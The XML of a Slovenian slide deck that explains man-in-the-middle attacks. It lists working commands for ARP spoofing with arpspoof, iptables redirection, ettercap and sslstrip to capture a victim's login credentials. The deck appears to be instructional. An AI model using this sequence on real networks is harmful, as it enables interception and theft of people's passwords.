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ot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l-SI" smtClean="0"/>
              <a:t>Kliknite, če želite urediti slog podnaslova matrice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FD6-9942-42DC-9FB8-2C07C57380B2}" type="datetimeFigureOut">
              <a:rPr lang="sl-SI" smtClean="0"/>
              <a:t>26.9.2012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738-DC13-4018-AC9D-B77824771D0F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Pravokot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FD6-9942-42DC-9FB8-2C07C57380B2}" type="datetimeFigureOut">
              <a:rPr lang="sl-SI" smtClean="0"/>
              <a:t>26.9.2012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738-DC13-4018-AC9D-B77824771D0F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ot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avokot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FD6-9942-42DC-9FB8-2C07C57380B2}" type="datetimeFigureOut">
              <a:rPr lang="sl-SI" smtClean="0"/>
              <a:t>26.9.2012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738-DC13-4018-AC9D-B77824771D0F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FD6-9942-42DC-9FB8-2C07C57380B2}" type="datetimeFigureOut">
              <a:rPr lang="sl-SI" smtClean="0"/>
              <a:t>26.9.2012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738-DC13-4018-AC9D-B77824771D0F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ot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FD6-9942-42DC-9FB8-2C07C57380B2}" type="datetimeFigureOut">
              <a:rPr lang="sl-SI" smtClean="0"/>
              <a:t>26.9.2012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738-DC13-4018-AC9D-B77824771D0F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FD6-9942-42DC-9FB8-2C07C57380B2}" type="datetimeFigureOut">
              <a:rPr lang="sl-SI" smtClean="0"/>
              <a:t>26.9.2012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738-DC13-4018-AC9D-B77824771D0F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FD6-9942-42DC-9FB8-2C07C57380B2}" type="datetimeFigureOut">
              <a:rPr lang="sl-SI" smtClean="0"/>
              <a:t>26.9.2012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738-DC13-4018-AC9D-B77824771D0F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FD6-9942-42DC-9FB8-2C07C57380B2}" type="datetimeFigureOut">
              <a:rPr lang="sl-SI" smtClean="0"/>
              <a:t>26.9.2012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738-DC13-4018-AC9D-B77824771D0F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FD6-9942-42DC-9FB8-2C07C57380B2}" type="datetimeFigureOut">
              <a:rPr lang="sl-SI" smtClean="0"/>
              <a:t>26.9.2012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738-DC13-4018-AC9D-B77824771D0F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1FD6-9942-42DC-9FB8-2C07C57380B2}" type="datetimeFigureOut">
              <a:rPr lang="sl-SI" smtClean="0"/>
              <a:t>26.9.2012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738-DC13-4018-AC9D-B77824771D0F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Pravokot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avokot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l-SI" smtClean="0"/>
              <a:t>Kliknite ikono, če želite dodati sliko</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US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5BF1FD6-9942-42DC-9FB8-2C07C57380B2}" type="datetimeFigureOut">
              <a:rPr lang="sl-SI" smtClean="0"/>
              <a:t>26.9.2012</a:t>
            </a:fld>
            <a:endParaRPr lang="sl-SI"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Pravokot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avokot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B488738-DC13-4018-AC9D-B77824771D0F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ot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Pravokot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BF1FD6-9942-42DC-9FB8-2C07C57380B2}" type="datetimeFigureOut">
              <a:rPr lang="sl-SI" smtClean="0"/>
              <a:t>26.9.2012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B488738-DC13-4018-AC9D-B77824771D0F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nekdo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ttercap.sourceforge.net/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.linux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oughtcrime.org/software/sslstrip/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.netfilter.org/projects/iptables/index.html" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://su2.info/doc/arpspoof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Man in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sl-SI" dirty="0" err="1" smtClean="0"/>
              <a:t>middle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sl-SI" dirty="0" smtClean="0"/>
              <a:t> napad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Kako izvedemo napad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sl-SI" dirty="0" smtClean="0"/>
              <a:t>Nato vključimo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sl-SI" dirty="0" err="1" smtClean="0"/>
              <a:t>iptables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sl-SI" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="sl-SI" dirty="0" smtClean="0"/>
              <a:t>Iptables –t nat –A PREROUTING –p </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sl-SI" dirty="0" err="1" smtClean="0"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sl-SI" dirty="0" smtClean="0"/>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sl-SI" dirty="0" err="1" smtClean="0"/>
              <a:t>destination</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sl-SI" dirty="0" smtClean="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sl-SI" dirty="0" err="1" smtClean="0"/>
              <a:t>port</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sl-SI" dirty="0" smtClean="0"/>
              <a:t> 80 –j REDIRECT –to-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sl-SI" dirty="0" err="1" smtClean="0"/>
              <a:t>ports</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sl-SI" dirty="0" smtClean="0"/>
              <a:t> 10000</a:t>
            </a:r>
            <a:endParaRPr lang="sl-SI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89040"/>
            <a:ext cx="766994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Kako izvedemo napad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r>
              <a:rPr lang="sl-SI" dirty="0" smtClean="0"/>
              <a:t>Zaženemo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sl-SI" dirty="0" err="1" smtClean="0"/>
              <a:t>arpspoof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sl-SI" dirty="0" smtClean="0"/>
              <a:t> v svoji konzoli</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="sl-SI" dirty="0" smtClean="0"/>
              <a:t>Arpspoof –t [žrtvin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sl-SI" dirty="0" err="1" smtClean="0"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sl-SI" dirty="0" smtClean="0"/>
              <a:t>] 192.168.1.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pP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Kako izvedemo napad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r>
              <a:rPr lang="sl-SI" dirty="0" smtClean="0"/>
              <a:t>Zaženemo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sl-SI" dirty="0" err="1" smtClean="0"/>
              <a:t>ettercap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sl-SI" dirty="0" smtClean="0"/>
              <a:t> v svoji konzoli</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="sl-SI" dirty="0" err="1" smtClean="0"/>
              <a:t>Ettercp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sl-SI" dirty="0" smtClean="0"/>
              <a:t> –T –q –i eth0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="sl-SI" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="sl-SI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852936"/>
            <a:ext cx="61926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Kako izvedemo napad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/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="sl-SI" dirty="0" smtClean="0"/>
              <a:t>Vklopimo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sl-SI" dirty="0" err="1" smtClean="0"/>
              <a:t>sslstrip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sl-SI" dirty="0" smtClean="0"/>
              <a:t> v svoji konzoli</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="sl-SI" dirty="0" err="1" smtClean="0"/>
              <a:t>Sslstrip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sl-SI" dirty="0" smtClean="0"/>
              <a:t> –a –k –f</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="sl-SI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852936"/>
            <a:ext cx="355925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Kako izvedemo napad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1"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="sl-SI" dirty="0" smtClean="0"/>
              <a:t>Počakamo da žrtev uporabi SSL </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="sl-SI" dirty="0" smtClean="0"/>
              <a:t>Potem se nam pri konzoli kje smo uporabili </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sl-SI" dirty="0" err="1" smtClean="0"/>
              <a:t>ettercap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sl-SI" dirty="0" smtClean="0"/>
              <a:t> ukaz izpiše uporabniško ime ter geslo žrtve.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="sl-SI" dirty="0" smtClean="0"/>
              <a:t>Npr. uporabniško ime za </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sl-SI" dirty="0" err="1" smtClean="0"/>
              <a:t>gmail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sl-SI" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sl-SI" dirty="0" err="1" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>nekdo@gmail.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sl-SI" dirty="0" smtClean="0"/>
              <a:t> ter njegovo geslo: 1234</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="sl-SI" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pP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potrebujemo za napad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>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Linux</a:t>
            </a:r>
            <a:endParaRPr lang="sl-SI" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="sl-SI" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Ettercap</a:t>
            </a:r>
            <a:endParaRPr lang="sl-SI" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="sl-SI" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Arpspoof</a:t>
            </a:r>
            <a:endParaRPr lang="sl-SI" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="sl-SI" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>Iptables</a:t>
            </a:r>
            <a:endParaRPr lang="sl-SI" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="sl-SI" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>SSLStrip</a:t>
            </a:r>
            <a:endParaRPr lang="sl-SI" dirty="0" smtClean="0"/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je napad </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sl-SI" dirty="0" err="1" smtClean="0"/>
              <a:t>MitM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Pri napadu s posrednikom ves promet med dvema računalnikoma poteka prek napadalčevega računalnika, ki igra vlogo vmesnega člena ali prestreznika. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="sl-SI" dirty="0" smtClean="0"/>
              <a:t>Zastrupljanje ARP je le eden izmed načinov za izvedbo takega napada. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="sl-SI" dirty="0" smtClean="0"/>
              <a:t>Seveda je tak napad najučinkovitejši, kadar poskušamo prestreči komunikacijo protokolov, ki so prosto berljivi (npr. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sl-SI" dirty="0" err="1" smtClean="0"/>
              <a:t>Telnet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sl-SI" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sl-SI" dirty="0" err="1" smtClean="0"/>
              <a:t>Rlogin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sl-SI" dirty="0" smtClean="0"/>
              <a:t>, FTP, SMTP, LDAP...).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je napad </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sl-SI" dirty="0" err="1" smtClean="0"/>
              <a:t>MitM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l-SI" dirty="0" smtClean="0"/>
              <a:t>To seveda ne pomeni, da pri uporabi šifrirnega protokola, npr. SSH, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sl-SI" dirty="0" err="1" smtClean="0"/>
              <a:t>Kerberos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sl-SI" dirty="0" smtClean="0"/>
              <a:t>,... MITM, napad ni mogoč. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="sl-SI" dirty="0" smtClean="0"/>
              <a:t>Vztrajnemu in izkušenemu hekerju zbiranje ter razbijanje šifriranih gesel ne povzroča večjih težav. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="sl-SI" dirty="0" smtClean="0"/>
              <a:t>V pomoč pa so mu tudi programi, kot sta </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sl-SI" dirty="0" err="1" smtClean="0"/>
              <a:t>mitm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sl-SI" dirty="0" smtClean="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sl-SI" dirty="0" err="1" smtClean="0"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sl-SI" dirty="0" smtClean="0"/>
              <a:t> ali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sl-SI" dirty="0" err="1" smtClean="0"/>
              <a:t>Cain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sl-SI" dirty="0" smtClean="0"/>
              <a:t> &amp; Abel, ki celoten proces pospešita in poenostavita. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="sl-SI" dirty="0" smtClean="0"/>
              <a:t>Komponente napada s posrednikom sestavljajo: napadalec, odjemalec in usmerjevalnik oziroma oddaljeni računalnik, s katerim ima odjemalec dostop do interneta.</a:t>
            </a:r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je napad </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sl-SI" dirty="0" err="1" smtClean="0"/>
              <a:t>MitM</a:t>
            </a:r>
            <a:endParaRPr lang="sl-SI" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="http://www.monitor.si/images/clanki/slika/mit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5294720" cy="4535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je napad </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sl-SI" dirty="0" err="1" smtClean="0"/>
              <a:t>MitM</a:t>
            </a:r>
            <a:endParaRPr lang="sl-SI" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18434" name="Picture 2" descr="http://www.monitor.si/images/clanki/slika/mitm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5462832" cy="4679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je napad </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sl-SI" dirty="0" err="1" smtClean="0"/>
              <a:t>MitM</a:t>
            </a:r>
            <a:endParaRPr lang="sl-SI" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20482" name="Picture 2" descr="http://www.monitor.si/images/clanki/slika/mitm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4874440" cy="41757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Kako izvedemo napad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sl-SI" dirty="0" smtClean="0"/>
              <a:t>Pridobimo žrtvin IP naslov</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="sl-SI" dirty="0" smtClean="0"/>
              <a:t>V </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sl-SI" dirty="0" err="1" smtClean="0"/>
              <a:t>linuxovi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sl-SI" dirty="0" smtClean="0"/>
              <a:t> konzoli moramo omogočiti </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sl-SI" dirty="0" err="1" smtClean="0"/>
              <a:t>Ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sl-SI" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sl-SI" dirty="0" err="1" smtClean="0"/>
              <a:t>forwarding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sl-SI" dirty="0" smtClean="0"/>
              <a:t> z ukazom – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sl-SI" dirty="0" err="1" smtClean="0"/>
              <a:t>echo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sl-SI" dirty="0" smtClean="0"/>
              <a:t> 1 &gt; /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sl-SI" dirty="0" err="1" smtClean="0"/>
              <a:t>proc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sl-SI" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sl-SI" dirty="0" err="1" smtClean="0"/>
              <a:t>sys</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sl-SI" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sl-SI" dirty="0" err="1" smtClean="0"/>
              <a:t>net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sl-SI" dirty="0" smtClean="0"/>
              <a:t>/ipv4/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sl-SI" dirty="0" err="1" smtClean="0"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sl-SI" dirty="0" smtClean="0"/>
              <a:t>_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sl-SI" dirty="0" err="1" smtClean="0"/>
              <a:t>forward</a:t>
            </a:r>
            <a:endParaRPr lang="sl-SI" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="sl-SI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1" y="3933056"/>
            <a:ext cx="515577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Kako izvedemo napad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sl-SI" dirty="0" smtClean="0"/>
              <a:t>Nato odpremo datoteko /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sl-SI" dirty="0" err="1" smtClean="0"/>
              <a:t>etc/etter.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sl-SI" dirty="0" smtClean="0"/>
              <a:t> z urejevalnikom</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="sl-SI" dirty="0" smtClean="0"/>
              <a:t>Pod </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sl-SI" dirty="0" err="1" smtClean="0"/>
              <a:t>iptables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sl-SI" dirty="0" smtClean="0"/>
              <a:t> moramo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sl-SI" dirty="0" err="1" smtClean="0"/>
              <a:t>odkomenitrati</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sl-SI" dirty="0" smtClean="0"/>
              <a:t> drugo vrstico</a:t>
            </a:r>
            <a:endParaRPr lang="sl-SI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3861048"/>
            <a:ext cx="708733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66</TotalTime>
  <Words>328</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Diaprojekcija na zaslonu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14</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="15" baseType="lpstr">
      <vt:lpstr>Modul</vt:lpstr>
      <vt:lpstr>Man in the middle napad</vt:lpstr>
      <vt:lpstr>Kaj potrebujemo za napad</vt:lpstr>
      <vt:lpstr>Kaj je napad MitM</vt:lpstr>
      <vt:lpstr>Kaj je napad MitM</vt:lpstr>
      <vt:lpstr>Kaj je napad MitM</vt:lpstr>
      <vt:lpstr>Kaj je napad MitM</vt:lpstr>
      <vt:lpstr>Kaj je napad MitM</vt:lpstr>
      <vt:lpstr>Kako izvedemo napad</vt:lpstr>
      <vt:lpstr>Kako izvedemo napad</vt:lpstr>
      <vt:lpstr>Kako izvedemo napad</vt:lpstr>
      <vt:lpstr>Kako izvedemo napad</vt:lpstr>
      <vt:lpstr>Kako izvedemo napad</vt:lpstr>
      <vt:lpstr>Kako izvedemo napad</vt:lpstr>
      <vt:lpstr>Kako izvedemo napad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 in the middle napad</dc:title>
  <dc:creator>NEJC</dc:creator>
  <cp:lastModifiedBy>NEJC</cp:lastModifiedBy>
  <cp:revision>7</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2012-09-26T21:07:25Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2012-09-26T22:14:08Z</dcterms:modified>
</cp:coreProperties>
</file>